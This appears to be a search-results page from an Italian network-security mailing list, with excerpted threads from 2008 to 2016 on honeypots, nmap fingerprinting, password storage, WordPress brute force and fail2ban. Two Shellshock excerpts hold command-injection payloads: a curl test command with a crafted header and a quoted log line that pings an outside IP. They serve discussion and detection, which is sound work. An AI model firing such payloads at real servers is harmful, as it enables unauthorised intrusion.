Il 20/11/2008 16:21, marcello ha scritto:
pensavo pertanto di installare un linux con su honeyd e quindi creare una
decina di apparati finti tra cui windows e cisco, mettere degli avvisi e
quindi sedermi ad aspettare.
pensate sia un approccio corretto (tenendo conto che la mia rete non e'
Il 03/03/2009 17:02, luca...@interfree.it ha scritto:
Mi e' stato chiesto dall'azienda di creare dei report sul traffico generato
sulle line internet (dico linee perche' ne abbiamo + di 1).
ntop? http://www.ntop.org/
Jan
Scusa per il ritardo nella risposta jjDaNiMoTh: come scrive anche
ono-sendai, tutto quel che descrivi sembra realizzato in OneSwarm, che è
una rete p2p attiva da tempo, documentata e funzionante.
Io mo ne sono occupato un anno fa, se vuoi approfondiamo.
Jan
On 28/02/2011 14:48, ono-sendai
Il 17/01/2013 23:01, Fabrizio De Carlo ha scritto:
consideriamo che lavori (fortunatamente, visto il periodo) facendo
consulenza in un'azienda. Consideriamo un device con un servizio non
riconosciuto dal fingerprint di nmap.
Secondo voi ? giusto inviarne il fingerprint a Fydor di Nmap
Il 17/01/2013 14:45, Patrizio Perna ha scritto:
mi piacerebbe avere una vostra opinione su quali metodi per voi sono piu'
sicuri o che garantiscono un buon trade-off tra sicurezza e comodita' per
la memorizzazione di password e credenziali d'accesso.
I metodi interessanti sono quelli che ti
Il 27/07/2014 10:32, Giuseppe Paterno' ha scritto:
Le uniche tracce nei log nello stesso momento mi risultano delle
chiamate xml-rpc
WordPress brute force attack via wp.getUsersBlogs
https://isc.sans.edu/diary/+WordPress+brute+force+attack+via+wp.getUsersBlogs/18427
Jan
Il 25/09/2014 11:51, kionez ha scritto:
A quanto pare in alcuni casi � sufficiente passare un qualsiasi header
fatto ad-hoc per testare la vulnerabilit�, ad esempio con un banale:
$ curl -i -X GET http://www.hostvulnerabile.it/cgi-bin/test.cgi; -A '()
{ :;}; echo Warning: Server Vulnerable'
Il 25/09/2014 13:20, P@sKy ha scritto:
E perchè mai hai oscurato l'indirizzo reale del collettore
dell'attaccante?
Anche da noi è arrivata la stessa cosa...
[25/Sep/2014:12:33:19 +0200] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
404 382 - () { :;}; /bin/ping -c 1 198.101.206.138
Perché non
Il 25/09/2014 14:28, Massimo Giaimo ha scritto:
Ciao Jan, lo scan in questione, per quanto scocciante possa sembrare,
Ma no, nessun disturbo. In verità sto tracciando i ping di risposta così
da conoscere i nodi vulnerabili senza fatica :-)
è ben dichiarato in questo link:
Il 03/03/2015 14:53, Michele Mazzotta ha scritto:
servizio tandem-print che risponde su
porta TCP/80 e TCP/40123 il quale viene identificato da nmap 6.47 come
Sharp printer tandem printing. Qualcuno di voi l'ha mai incontrato
prima?
Su delle stampanti Sharp, porta TCP/50001 e su dei client
Il 11/09/2016 10:40, Marco Bettini ha scritto:
> Buon giorno a tutti, ho un server che in questo periodo é fortemente
> sotto attacco. Allego screenshot delle notifiche di ban di fail2ban (
> scusate la stupida ripetizione ) ricevuti in un arco di 2min.
>
> Dopo un po di giorni di scansioni perdo
11 matches
Mail list logo